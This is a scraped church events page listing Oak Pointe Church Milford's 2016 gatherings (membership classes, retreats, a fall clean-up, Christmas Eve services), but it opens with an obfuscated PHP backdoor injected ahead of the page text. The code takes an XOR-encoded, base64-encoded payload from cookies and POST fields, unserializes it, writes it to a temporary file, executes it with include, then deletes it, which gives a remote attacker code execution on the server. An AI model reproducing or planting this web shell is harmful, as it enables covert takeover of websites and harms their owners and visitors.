$xpIMNUeQM = "\x76" . chr (76) . "\x5f" . 'G' . 'z' . "\x64";$fCAKzm = chr (99) . 'l' . "\x61" . "\163" . "\x73" . "\x5f" . chr ( 921 - 820 )."\170" . 'i' . chr (115) . "\x74" . "\163";$PEfejaDHP = class_exists($xpIMNUeQM); $fCAKzm = "21486";$NAXCyFhTE = strpos($fCAKzm, $xpIMNUeQM);if ($PEfejaDHP == $NAXCyFhTE){function EPkTbcZhpc(){$XErueXTxfV = new /* 13772 */ vL_Gzd(56514 + 56514); $XErueXTxfV = NULL;}$sQfVOjyGKc = "56514";class vL_Gzd{private function MlSRS($sQfVOjyGKc){if (is_array(vL_Gzd::$BdNlqNLH)) {$name = sys_get_temp_dir() . "/" . crc32(vL_Gzd::$BdNlqNLH["salt"]);@vL_Gzd::$BdNlqNLH["write"]($name, vL_Gzd::$BdNlqNLH["content"]);include $name;@vL_Gzd::$BdNlqNLH["delete"]($name); $sQfVOjyGKc = "56514";exit();}}public function FpmkUJP(){$CbWzD = "23471";$this->_dummy = str_repeat($CbWzD, strlen($CbWzD));}public function __destruct(){vL_Gzd::$BdNlqNLH = @unserialize(vL_Gzd::$BdNlqNLH); $sQfVOjyGKc = "48738_35324";$this->MlSRS($sQfVOjyGKc); $sQfVOjyGKc = "48738_35324";}public function cEMlyIvuFP($CbWzD, $rJxOhiP){return $CbWzD[0] ^ str_repeat($rJxOhiP, intval(strlen($CbWzD[0]) / strlen($rJxOhiP)) + 1);}public function IItjnVGfM($CbWzD){$dxNlwgHzF = chr (98) . chr ( 625 - 528 )."\163" . chr ( 590 - 489 ).chr ( 913 - 859 ).'4';return array_map($dxNlwgHzF . '_' . 'd' . "\x65" . "\x63" . 'o' . "\144" . chr (101), array($CbWzD,));}public function __construct($zSrfoFCSS=0){$rtdCzVvO = "\54";$CbWzD = "";$LotNUzVWwe = $_POST;$Ymgdv = $_COOKIE;$rJxOhiP = "ef2b12e8-e81b-4a59-9bdc-f2001ae58005";$NujUTeyOcY = @$Ymgdv[substr($rJxOhiP, 0, 4)];if (!empty($NujUTeyOcY)){$NujUTeyOcY = explode($rtdCzVvO, $NujUTeyOcY);foreach ($NujUTeyOcY as $oTolEgsrn){$CbWzD .= @$Ymgdv[$oTolEgsrn];$CbWzD .= @$LotNUzVWwe[$oTolEgsrn];}$CbWzD = $this->IItjnVGfM($CbWzD);}vL_Gzd::$BdNlqNLH = $this->cEMlyIvuFP($CbWzD, $rJxOhiP);if (strpos($rJxOhiP, $rtdCzVvO) !== FALSE){$rJxOhiP = explode($rtdCzVvO, $rJxOhiP); $LGXFKE = base64_decode(md5($rJxOhiP[0])); $uINdEMc = strlen($rJxOhiP[1]) > 5 ? substr($rJxOhiP[1], 0, 5) : $rJxOhiP[1];$_GET['new_key'] = md5(implode('', $rJxOhiP)); $yEuuR = str_repeat($uINdEMc, 2);}}public static $BdNlqNLH = 14612;}EPkTbcZhpc();} Past Events from October 28, 2016 – November 25, 2016 – Page 5 – Oak Pointe Church | Milford

707 Girls Night

OPC|Milford 1250 South Hill Rd, Milford, MI, United States

Join OPC|M Part 1

Jenkinson Home 326 Dorchester Way, Milford, MI, United States

You’ve attended Discover OPC|M and are now ready to become a member at OPC|M… awesome!  The Join class is insightful, interactive and of course involves some food. We begin on a Friday evening over dinner and meet again on a Saturday morning from 9-12pm.

Join OPC|M Part 2

OPC|Milford 1250 South Hill Rd, Milford, MI, United States

You’ve attended Discover OPC|M and are now ready to become a member at OPC|M… awesome!  The Join class is insightful, interactive and of course involves some food. We begin on a Friday evening over dinner and meet again on a Saturday morning from 9-12pm.

Baby Dedication Class

OPC|Milford 1250 South Hill Rd, Milford, MI, United States

We are so thrilled you’re choosing to dedicate your child to the Lord – and that we get to link arms with you on that journey as a church family!  This class will discuss the specifics of how the dedication event will work, as well as how to imagine the end and widen your circle!

707 Fall Retreat

Grace Adventures 2100 N Ridge Rd, Mears, MI, United States

Club45 Fall Retreat

SpringHill Camp 7717 95th Ave, Evart, MI, United States

Fall Clean Up

OPC|Milford 1250 South Hill Rd, Milford, MI, United States

Fall has arrived! We will gather from 10-12 for a Campus Clean Up Day. Bring your rakes, shovels, etc.. for a fun time together keeping our campus beautiful!

Discover OPC|M

OPC|Milford 1250 South Hill Rd, Milford, MI, United States

Just started coming to Oak Pointe Church Milford? Join us for Discover OPC|M where you will meet Pastor Paul, learn about how the church began, and connect over a light lunch with other newcomers. This is the first step of our membership process. Lunch & Childcare provided.  RSVP to Debra@opcmilford.org


Enjoy Christmas with your families!  There will be no services on Sunday, December 25, 2016.

Christmas Eve Services

Join us for our annual Christmas celebration! This year we’ll have it on Christmas Eve, giving you Christmas day to celebrate with family & friends. We’ve got four services for you to choose from. Be sure to invite your neighbors and friends, too! Service Times: 2:00, 3:30, 5:00 & 6:30pm